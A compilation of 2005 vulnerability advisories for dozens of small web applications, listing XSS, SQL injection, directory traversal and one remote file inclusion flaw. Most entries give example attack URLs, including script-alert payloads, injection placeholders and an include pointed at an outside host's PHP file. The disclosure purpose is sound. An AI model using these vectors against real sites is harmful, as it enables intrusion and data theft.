100% ASP based Knowledge base application that uses a simple MS Access or robust MS SQL database to store articles, FAQ's, etc. in an organized way. Features: Powerful search engine, Clean and intuitive interface, Highly configurable display, Web admin to add, edit and archive articles and categories, Add related downloads to articles, Refer to related articles, User poll, Email feedback, and Article hit counter. Language module support, Logging, NT Authentication.

Vuln. Description:
ASP based Knowledge contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "a" paremter in "kb.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/kb.asp?a=%22%3E%3Cscript%3E
alert('r0t')%3C/script%3E

/kb.asp?ID=210&a=%22%3E%3Cscript
%3Ealert('r0t')%3C/script%3E

Solution:
Edit the source code to ensure that input is properly sanitised.

NetAuctionHelp v3.0 XSS Vuln

NetAuctionHelp v3.0 XSS Vuln
Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:http://www.netauctionhelp.com/
affected version:v3.0 and prior

Product Description:
NetAuctionHelp provides auction site source code and managed hosting solutions for the Windows platform. Our auction sites are packed with features for the bidder, seller, and administrator. Our solutions include both complete source code for use on a single web site, and managed hosting solutions for those needing hosting.

Vuln. Description:
NetAuctionHelp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "L","sort","category","categoryname" paremters in "search.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:
/search.asp?sort=ed&L=[XSS]
/search.asp?sort=[XSS]
/search.asp?sort=ed&L=1&category=[XSS]
/search.asp?sort=ed&L=1&category=65&categoryname=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

XcClassified v3.x XSS vuln

XcClassified v3.x XSS vuln

Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:http://www.xcclassified.com/
affected version: v3.x and prior



Product Description:
Get XcClassified, the leading ASP classified ads software! Add the power of internet ad listings to any web site.
Since XcClassified is highly customizable, you have the power to make changes in both its look and functionality. Its look and feel can be quickly and easily adjusted to seem 100% integrated with the rest of your web site's design. You can even customize the text and currency for any language or locale. A variety of configuration options make it easy to tailor XcClassified to suit your preferences.


Vuln. Description:
XcClassified contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search paremters in "CPSearch.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

XcPhotoAlbum v1.x XSS vuln.

XcPhotoAlbum v1.x XSS vuln.
Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:http://www.xcphotoalbum.com/
affected version:v1.x and prior

Product Description:
XcPhotoAlbum makes it fast and easy to organize many photos on your web site. You can use it for something as simple as a place to post images for friends and family. You can also use it at work, by creating a gallery of images for products. Show your products in their best light by showing how they are used. Or how your customers use them. It can also be a great way to show things like maintenance procedures or assembly techniques. With XcPhotoAlbum, you are only limited by your imagination.

Vuln. Description:
XcPhotoAlbum contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search paremters in "PASearch.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

rwAuction Pro v4.0 XSS vuln.

rwAuction Pro v4.0 XSS vuln.
Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:www.rainworx.com/auction_software.asp?ref=hs1
affected version:rwAuction Pro v4.0 and prior

Product Description:
rwAuction Pro is a feature packed Auction, Classified, and Storefront software package! Also: Bulkloader, Fixed Price, BuyItNow, Dutch, and Trade. HTML editor, Skins, Mult Images, Thumb Creation, Web Admin, Billing, Mult Currencies, Email Templates & MORE!

Vuln. Description:
rwAuction Pro v4.0 contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "searchtxt" paremter in "search.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:
/search.asp?searchtxt=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

Ideal BB.NET 1.3 XSS vuln

Ideal BB.NET 1.3 XSS vuln
Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:www.idealscience.com/site/products/idealbb.net.aspx
affected version: 1.3 and prior

Product Description:
It is a powerful bulletin board program designed to run on the Microsoft .NET framework. It uses Windows technologies and Microsoft SQL server to provide the most powerful bulletin board experience. It offers unparalleled customization options and the most scalable features of any Windows based bulletin board system to date.

Vuln. Description:
Ideal BB.NET contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "forumID" "boardID" "postID" "catID" "memberID" in to paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


few examples:

/topics.aspx?forumID=59%22%3E%3Cscript%3Ealer
t('r0t')%3C/script%3E

/categoryindex.aspx?boardID=1%22%3E%3Cscript%3
Ealert('r0t')%3C/script%3E

/topics.aspx?date=12/05/2005&boardID=1%22%3E%
3Cscript%3Ealert('r0t')%3C/script%3E

/posts.aspx?postID=%22%3E%3Cscript%3Ealert(
'r0t')%3C/script%3E

/forums.aspx?catID=%22%3E%3Cscript%3Ealert(
'r0t')%3C/script%3E

/member.aspx?memberID=%22%3E%3Cscript%3Eal
ert('r0t')%3C/script%3E

/topics.aspx?forumID=54&topicRepeater1-p=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

Solution:
Edit the source code to ensure that input is properly sanitised.

LocazoList Classifieds v1.03c Vuln.

LocazoList Classifieds v1.03c Vuln.
Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:http://locazo.net:81/applications/
affected version:v1.03c and prior

Product Description:
LocazoList a Free, text based classifieds system that tries to emulate the popular classifieds organization Craigslist. Easy to use and self maintaining, LocazoList is a great application for small sites that need a fast and simple classifieds system. The system was made completely in ASP and Access (Right now there is No MySQL support).

Vuln. Description:
Input passed to the "q" parameter in "searchdb.asp" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and also it can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/searchdb.asp?q=[CODE]&mode=AND&Submit=Search

Solution:
Edit the source code to ensure that input is properly sanitised.

saralblog v1 SQL inj. vuln.

saralblog v1 SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:http://www.saralblog.org/
affected version:v.1 and prior

Product Description:
saralblog is a very simple to use blog, which has some very innovative feautures. It uses dynamic tags instead of categories which makes posting a lot quicker and easier. It also has RSS, multi-user support and moderation.

Vuln. Description:
Input passed to the "id" parameter in "viewprofile.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/viewprofile.php?id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

PluggedOut Nexus SQL&XSS vuln.

PluggedOut Nexus SQL&XSS vuln.
Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:www.pluggedout.com/index.php?pk=dev_nexus
affected version:0.1

Product Description:
Nexus is an open source script you can run on your web server to give you a community based website where people can register, search each others interests, and communicate with one another either through a private messaging system, or via chat requests and forums.

Vuln. Description:
Input passed to the "Location" "Last Name" "First Name" field parameters in "search.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and also it can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

PluggedOut Blog SQL vuln.

PluggedOut Blog SQL vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:www.pluggedout.com/index.php?pk=dev_blog
affected version:1.9.4 , 1.9.5 and prior

Product Description:
Blog is an open source script you can run on your web server to give you an online journal or diary. It can be used equally well for any kind of calendar application. Features - Multi User (with Roles : Admin, Author, Contributor) - Themes and Templates - Wonderful admin/authoring interface - Calendar with hilighted entries - RSS feed support built in - Smiley Faces - Great templating system - Comments on entries - Superb support forum - Built by a professional software developer - Based on PHP, MySQL

Vuln. Description:
Input passed to the "categoryid","entryid","year","month","day" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?categoryid=[SQL]
/index.php?entryid=[SQL]
/index.php?month=1&year=[SQL]
/index.php?month=[SQL]
/index.php?year=2005&month=12&day=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

iWonder Designs

iwonderdesigns.com/storystream/

iWonder Designs provides custom application and web development services at affordable prices
with the highest standards of quality.

StoryStream:
-Stories
....
-Reading Room
....
-Creativity Room
....
-Lounge
....

Bug:
/include/files.inc.php

The variable $baseDir is used in an insecure manner. If registered_globals=On, remote code execution can result.

example:
baseDir=pridels.blogspot.com/iwonderdesignsUCKS.php?

This product is still in Beta according to sourceforge. However since these developers also do 'contract' coding, I do
not doubt this product may appear in final production servers.

Similar problems may exist in sites coded by them.
iwonderdesigns.com/contracting/
Even though they claim:
"Highest standards of quality" But maybe basic security is not part of their high standards.


der4444 - pridels.blogspot.com
How can people make money coding crap like that?
This document is the intellectual property of me, so leave it as is.

coWiki 0.3.4 XSS vuln

coWiki 0.3.4 XSS vuln
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.cowiki.org/
affected version: coWiki 0.3.4 (Boron) and prior

Product Description:
coWiki is a sophisticated but easy to use web collaboration tool that helps you and your co-workers to create and organize web documents, weblogs and knowledgebases or any other document structures directly in their HTML browser. You may evolve ideas and gain a concomitant XML documentation of your brainstorming without having to concentrate on complicated structural syntaxes.
In many senses, it is very like a wiki but additionally provides an easy way to secure and discuss its documents.

Vuln. Description:
Input passed to the "q" parameter isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/26.html?cmd=srchdoc&q=%22%3E%3Cscript
%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&x=7&y=14

Solution:
Edit the source code to ensure that input is properly sanitised.

Blog System v1.2 SQL inj. vuln.

Blog System v1.2 SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.netartmedia.net/blogsystem/
affected version:v1.2 and prior

Product Description:
Blog System allows you to launch and run powerful blog portals and your own weblog hosting service or simply integrate blog functionality to your existing website. The system offers rich functionality for the blog users to update their blogs (add notes, comments, upload pictures and create photo albums, upload audio and video files and many others) and for the administrators to monitor and control the whole system (monitor the users, the space occupied and the bandwidth of the blogs, manage the website structure and content with a powerful CMS and many others). Blog System is a reliable blog software product which comes with an easy customizable template based front site and blog administration space. In order to run a blog portal with it, you don't need your own server or virtual server but just an ordinary hosting package supporting PHP and MySQL. We offer flexible payment schemes and free customization of the blog portal front site in order that it matches the best your needs.

Vuln. Description:
Input passed to the "cat" parameter in "index.php" and "note" parameter in "blog.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/blog.php?user=r0t¬e=[SQL]
/index.php?mode=home&cat=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Cars Portal v1.x SQL injection.

Cars Portal v1.x SQL injection.

Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://software.getcar.biz/
affected version:v1.1 and prior

Product Description:
Cars Portal is a software solution for running auto classifieds portals. It provides functionality for the private sellers to signup, list their car for sale and make changes in their ads online using the private sellers administration space. The product provides special functionalities for the dealers to work and manage multiple ads. An affiliate functionality is also included, affiliate partners may signup and earn commissions on all the sales done through their links. The product comes with a very powerful back office application for the administrators, allowing them not only to manage the cars portal settings, the dealers, affiliates etc. but also providing them full control over the website, its structure and content, statistics, search engines functionality and many others.

Vuln. Description:
Input passed to the "page" and "car" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?page=[SQL]
/index.php?page=en_Home&car=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

HobSR SQL inj. vuln

HobSR SQL inj. vuln
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:www.hobosworld.com/scripts.php?id=5
affected version:1.0 and prior

Product Description:
HobSR is an top sites script where users sign up to have their website on a list of websites, and each click in/out is counted for them. This script has the ability to have unlimited admins and websites. This script also features a varify program where all websites who sign up must be varified by the admin to be put on the list. You NEED MYSQL to run this script.

Vuln. Description:
Input passed to the "arrange" and "p" parameter in "view.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/view.php?arrange=[SQL]
/view.php?p=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

KeyWord Frequency Counter v1.0 XSS vuln.

KeyWord Frequency Counter v1.0 XSS vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.web4future.com/free/wordcount.htm
affected version:1.0 and prior


Product Description:

Is a free script that analizez the word structure of any page on your website and lets you compare it with your competitors.
Written in: Perl for Unix

Vuln. Description:

KeyWord Frequency Counter contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the remote URL upon submission to the index.cgi script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:

Edit the source code to ensure that input is properly sanitised.

Web4Future eDating Professional v5 sql vuln.

Web4Future eDating Professional v5 sql vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.web4future.com/products.php?p=edating
affected version: v5 and prior

Product Description:
eDating Professional is an online dating software that allows you to start your own dating website.

Vuln. Description:
Input passed to the "s","pg","sortb" parameter in "index.php" and "cid" parameter in "gift.php","fq.php" and "cat" parameter in "articles.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?afis=browse&s=[SQL]
/index.php?afis=profil&pg=[SQL]
/index.php?afis=SelCupidonNoLog&sortb=[SQL]
/gift.php?A=ViewGifts&cid=[SQL]
/articles.php?cat=1[SQL]
/articles.php?A=ViewArticles&cat=1[SQL]
/fq.php?A=ViewFQ&cid=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Web4Future Portal Solutions - News Portal vuln.

Web4Future Portal Solutions - News Portal vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.web4future.com/products.php?p=nportal
affected version: latest

Product Description:
It's a professional solution dedicated for Newspapers and publications that want to easily present their paper on the Internet. It comes with an easy to use web site manager, automated newsletter creation utility, automated weather forecast system and currency converter. It creates everything automated: front page, newsletter, archive.

Vuln. Description:

1. SQL injection vuln.
Input passed to the "idp" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/comentarii.php?idp=[SQL]

2.Directory Traversal vuln.

Input passed to the "dir" parameter isn't properly sanitised before being used to open a file. This can be exploited to view the contents of arbitrary files on the system via directory traversal attacks.

example:
/arhiva.php?dir=../

Solution:
Edit the source code to ensure that input is properly sanitised.

eCommerce Enterprise Edition SQL inj. vuln.

Web4Future eCommerce Enterprise Edition v2.1 SQL inj. vuln.

Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.web4future.com/products.php?p=ecomm
affected version:v2.1 and prior + eCommerce HOME edition have same vuln.

Product Description:
A fully template driven system which you can use the software to sell any kind of products from computers, household items, downloadable goods, services, groceries, cars or real estates.


Vuln. Description:

Input passed to the "prod","brid" parameter in "view.php" and "bid" parameter in "viewbrands.php" and "grp","cat" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:
/view.php?prod=[SQL]
/viewbrands.php?bid=[SQL]
/view.php?prod=1010001&brid=[SQL]
/index.php?action=ViewGroups&grp=[SQL]
/index.php?action=ViewCategories&cat=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Web4Future Affiliate Manager PRO SQL inj. vuln.

Web4Future Affiliate Manager PRO SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.web4future.com/products.php?p=aff
affected version:4.1 and prior

Product Description:
Affiliate Manager Professional is an affiliate script that was created to ease your work. It keeps track of the new affiliates and let's you approve them with a single click, keeps track of every buy generated by a referral, it has a fraud detection system that e-mails you when there are problems, displays graphical stats in multiple forms, clear and easy to use interface, etc. It can be used to track recurring commissions and now allows MLM affiliate programs.

Vuln. Description:

Input passed to the "pid" parameter in "functions.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:
/functions.php?action=ViewPaymentLog&pid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Easy Search System v1.1 XSS vuln.

Easy Search System v1.1 XSS vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.hotcgiscripts.net/?c=e-search
affected version:v1.1 and prior


Product Description:
Easy Search System is a powerful, customizable and effective site indexing/searching script. Index your website over cgi, php, asp and any webpages. It collect meta description, meta keywords, titles, page content and link texts from all pages on your site. You could define power of all this page parts to create search the most powerful. Customize search results and "Not found" pages. Edit stop words. Search with parts of site. Show in statistics the most searchable keywords and not found keywords. You can create page's groups. Index groups of your site every day, week or month automatically. Define rules to automatically add pages to groups or ignore files and directories. It shows dead links into your site and links to dead sites. You can see internal and EXTERNAL out and in links for every indexed page with Easy Search System script.Could index several sites into one database and your users can search all your sites from one form. Or search only parts of your site. You could create several search forms to search any of you site parts.You can search for one or more terms at the same time. You may input single words and phrases as search terms at the same time. Phrases are enclosed inside quotes - as known from world wide search engines like in Google. Terms can be combined by logical operators: the sign "+" marks a term as forced (it must be present); the sign "-" marks a term as forbidden (it must not be present) Possibility to automatically mark all unsigned terms as forced (by activating the checkbox "+" near the input field)
The Easy Search System provides a solution with far more flexibility and power than any other at a price you can afford.



Vuln. description:
Input passed to the "q" parameter in "search.cgi" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/search.cgi?q=[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

1- Search XSS vuln.

1- Search XSS vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.1-script.com/1_search/
affected version:1.80 and prior


Product Description:
An advanced site search script written with search engines positioning in mind - result pages contain all proper tags to be submitted to search engines as doorway pages. The script logs all the searches, found and not found, inserts affiliate codes so that you never miss commission. Comes with advanced administration utility for setup, viewing statistics, changing appearance and much more. New version includes an optimized search algorithm for faster searches.

Vuln. description:
Input passed to the parameter "q" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


example:
/1search.cgi?q=[XSS]&boolean=ALL&case=
Insensitive

Solution:
Edit the source code to ensure that input is properly sanitised.

Amazon Search Directory XSS vuln.

Amazon Search Directory XSS vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.mrcgiguy.com/amazondetails.shtml
affected version:v.1.0.0 and prior


Product Description:

* Very easy to set up and use
* Customizable Header/Footer Templates
* Automatic insertion of Amazon QuickPay links with your affiliate code.
* Easy to navigate and search.
* Read to use 'out of box'. The script comes with the categories already created as seen in the demo. Use them if you'd like, or start from scratch.
* Capable of searching any product type in Amazon's catalog.


Vuln. description:

Input passed to the parameter in "search.cgi" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

Hot Links Pro 3.x XSS vuln.

Hot Links Pro 3.x XSS vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.mrcgiguy.com/hl3details.shtml
affected version:3.x and prior

Product Description:
* Directory style index allows for easy navigation
* Does not require MySQL, MS Access, or any other database software. Hot Links Pro uses it's own integrated flat-file database system.
* Out going hits are recorded creating a popular links list and displaying a cumulative hit count which is also used to build a Hot Links Page.
* You control how many links to display on the popular links list
* You control how many hits a site must have before being listed on the Hot Links Page
* Cheat protection using IP address for outgoing hits (1 hit per IP per day)
* Duplicate link verification (Now has option to disable, or to losen the restrictions to allow duplicates as long as they're in seperate categories).
* Easily edit the look of your directory without having to pick through any of the PERL code. Header and footer HTML is kept in seperate text files.
* Will run on most servers with Perl 5.x and SendMail installed. Recommended for Unix/Linux or WinNT.
* Features an easy to edit language file that makes translating the script into other languages painless.
* New split page listings, break up longer category listings for easier navigation.
* Create infinite subcategory levels.
* Most recent listings display right on the index page. You control how many to show.
* Searchfeed.com Results Integration. Share revenue from this PPC giant by incorporating their feed into your directory



Vuln. description:

Input passed to the parameter in "search.cgi" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

Hot Links SQL 3.x XSS vuln.

Hot Links SQL 3.x XSS vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.mrcgiguy.com/hlsqldetails.shtml
affected version:3.1.x and prior

Product Description:
# irectory style index allows for easy navigation
# Utilizes the power of MySQL to deliver blazing fast content regardless of the amount of data.
# Out going and incoming hits are recorded creating a popular links list and displaying a cumulative hit count which is also used to build a Hot Links Page.
# Control how many links to display on the popular links list.
# Control the amount of top search terms to display on the index.
# Control how many hits a site must have before being listed on the Hot Links Page.
# Cheat protection using IP address for outgoing & incoming hits (1 hit per IP per day).
# Duplicate link verification (Now has option to disable, or to losen the restrictions to allow duplicates as long as they're in seperate categories).
# Easily edit the look of your directory without having to pick through any of the PERL code. Almost 100% template based.
# Will run on most servers with Perl 5.x, MySQL and SendMail installed. Recommended for Unix/Linux.
# Split page listings, break up longer category & search result listings for easier navigation.
# Create infinite subcategory levels.
# Most recent listings display right on the index page. You control how many to show.
# Features static HTML or Dynamic mode. HTML mode is highly beneficial for search engine rankings and Google PageRank.
# Intergrated reviews and ratings system.
# Integrated Searchfeed.com results search feed.
# No longer requires SSI.
# Static or Dynamic outgoing urls. Now more search engine friendly than ever. Don't want to use redirects, just turn the static url option on.
# Seperate template for sponsor links, make them really stand out and encourage link owners to pay for the upgrade.
# Algorithm sorting on categories and search results pages. More info here.




Vuln. description:

Input passed to the parameter in "search.cgi" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

Warm Links XSS vuln.

Warm Links XSS vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.mrcgiguy.com/wldetails.shtml
affected version:v.1.0.0 and prior

Product Description:
* Directory style index allows for easy navigation
* Does not require MySQL, MS Access, or any other database software. Warm Links uses it's own integrated flat-file database system.
* Customizable Color Scheme
* Duplicate link verification
* Easily edit the look of your directory without having to pick through any of the PERL code. Header and footer HTML is kept in seperate text files.
* Will run on any server with Perl 5.x and SendMail installed.


Vuln. description:

Input passed to the parameter in "search.cgi" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

FileLister SQL inj. vuln.

FileLister SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.alltimeflashdreamer.org/filelister/doc/
affected version:0.51 and prior

Product Description:
FileLister is a filesystem indexing tool with a web based frontend. Running platformindependently in a web environment, its goal is to easily find files in large archives, using a rich set of search configuration options. Additionally, you may download single files or even create and download zip files on the fly from the results of your search.


Vuln. description:
Input passed to the search parameters isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

Widget Property Vuln.

Widget Property Vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
vendor:http://www.widgetpress.com/products?product=wp
affected version:1.1.19 and Easy,CSV,Lite versions.


Product Description:
Easily manage all your listings in a turnkey database driven web application. Powerful server software with multi-user support, Upload multiple media files. Auto generation of PDF flyers with listing photos, Add featured properties, resume profiles, articles, Generate neighborhood profiles, area profiles, city profiles, area appreciation, utilities, schools, custom generated home page with photos, admin the entire site from anywhere in the world, and dynamic multi-language support. Agent dynamic Vcards. Publish property listings and articles in RSS real estate feeds. Auto syndicates real estate feeds with www.propertyrss.com. Comes with 1 year of Paid Subscriber API's to www.propertyrss.com. Publishes your properties to www.propertywalkthru.com, a free classified real estate site. Supports template interface with XHTML and CSS in a tableless environment.

Vuln. description:
Input passed to the "property_id" "zip_code" "property_type_id" "price" "city_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Also input passed to the "lang" parameter in "property.php" isn't properly sanitised , attacker can get full path discoloure.

examples:
/property.php?action=property&property_id=[SQL]

/property.php?action=search&city_id=&zip_code
=[SQL]&price=&property_type_id=1&submit=submit

/property.php?action=search&city_id=&zip_code=
&price=75000&property_type_id=[SQL]&submit=submit

/property.php?action=search&city_id=&zip_code=
&price=[SQL]&property_type_id=&submit=submit

/property.php?action=search&city_id=[SQL]&zip_code=
&price=&property_type_id=&submit=submit


/property.php?lang=r0t

Solution:
Edit the source code to ensure that input is properly sanitised.

Widget Imprint SQL inj. vuln.

Widget Imprint SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
Vendor:http://www.widgetpress.com/products?product=wimprint
affected version: 1.0.26 and prior

Product Description:
Database driven web software designed for the heat-transfer imprint, impact print shop to sell promotional items online. (similar to CafePress.com, but you can add any imprintable product you like) Have your customers create their own products, such as T-shirts, mugs, mousepads, boxers, aprons, coasters and so on, with real-time preview. Complete print web service package, Product management, Add product samples, Order tracking, Add company logo, CMS, Real-time customer photo upload, Shopping cart, Online commerce, and Multi-language suppor


Vuln. description:
Input passed to the "product_id" parameter in "create.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/create.php?action=create&product_id=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Landshop Real Estate Commerce System Vuln.

Landshop Real Estate Commerce System Vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
Vendor:http://www.landshop.gr/en/index.htm
affected version: 0.6.3 and prior

Product Description:
LandShop is a free system for presentation and sales of real estate through the internet It offers - PDF generation on the fly for administrators and visitors - creation of wishlists for visitors that can be sent by email - multi-language capabilities: English,French, Spanish, German and Greek preinstalled - Support for Google maps - Currency conversion - Extensive configuration options for administrators - Multiple users and user levels (administrator, operator)


Vuln. description:
Input passed to the "start" "search_order" "search_type" "search_area" "keyword" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Also input passed to the "lang" parameter in "ls.php" isn't properly sanitised , attacker can get full path discoloure.

example:
/ls.php?lang=en&action=list&start=[SQL]

/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword
=&search_area=&search_type=&infield=&search_order=[SQL]

/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword
=&search_area=&search_type=[SQL]

/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=[SQL]

/ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword
=&search_area=[SQL]



/ls.php?lang=[CODE]


Solution:
Edit the source code to ensure that input is properly sanitised.

Relative Real Estate Systems SQL inj. vuln.

Relative Real Estate Systems SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 5 dec. 2005
Vendor:http://www.dboorn.com/estate/
affected version:1.02 and prior

Product Description:
Elegant real estate script that allows for unlimited listings and agents with featured listings, unlimited photos, advanced search engine, user login option, user tracking, dynamic slide shows, Mls/Idx support, multiple agents with photo, mortgage calculator, schools info, C.M.A. request form, full admin panel, much more...

Vuln. description:
Input passed to the "mls" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?name=&price_from=&price_to=
&city=&state=SC&mls=[SQL]&bathroom=-1
&bedrooms=-1&go=search&results=1

Solution:
Edit the source code to ensure that input is properly sanitised.

phpYellowTM Pro Edition SQL inj. vuln.

phpYellowTM Pro Edition SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 3 dec. 2005
Vendor:http://phpyellow.com/
affected version: phpYellowTM Pro Edition 5.33 and phpYellowTM Lite Edition 5.33

Product Description:

Profit from web yellow pages. Brandable interface. Recurring revenue potential. Easily create web yellow pages. phpYellow Pro EditionTM is the software of choice for making and managing web yellow pages. Secure. Stealth EmailTM protects 100% of listing email addresses. Member & Webmaster login. Online demo. PHP/MySQL open source, no encryption, has source code comments. Flexible and varied searches include Search by Map, Keyword, Smart BrowseTM, HyperSearchTM, Find Needle in Haystack, State Search, Category and City Search, Sub-index. Search and public display template is customizable with PHP programming skills. Free, paid and renamable listing types. Set your own prices. Paypal gateway included. Customization and installation is also available for an additional fee. This is the ORIGINAL phpYellow Pages. Try our online demo or download the free Lite Edition. See how easy it is to start your own online business directory - with revenue potential.

Vuln. Description:


Input passed to the "haystack" parameter in "search_result.php" and "ckey" parameter in "print_me.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:
/search_result.php?search=url&haystack=[SQL]
/print_me.php?ckey=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

The European Hacker Conference

The 22nd Chaos Communication Congress (22C3) is a four-day conference on technology, society and utopia. The Congress offers lectures and workshops on a multitude of topics including (but not limited to) information technology, IT-security, internet, cryptography and generally a critical-creative attitude towards technology and the discussion about the effects of technological advances on society.

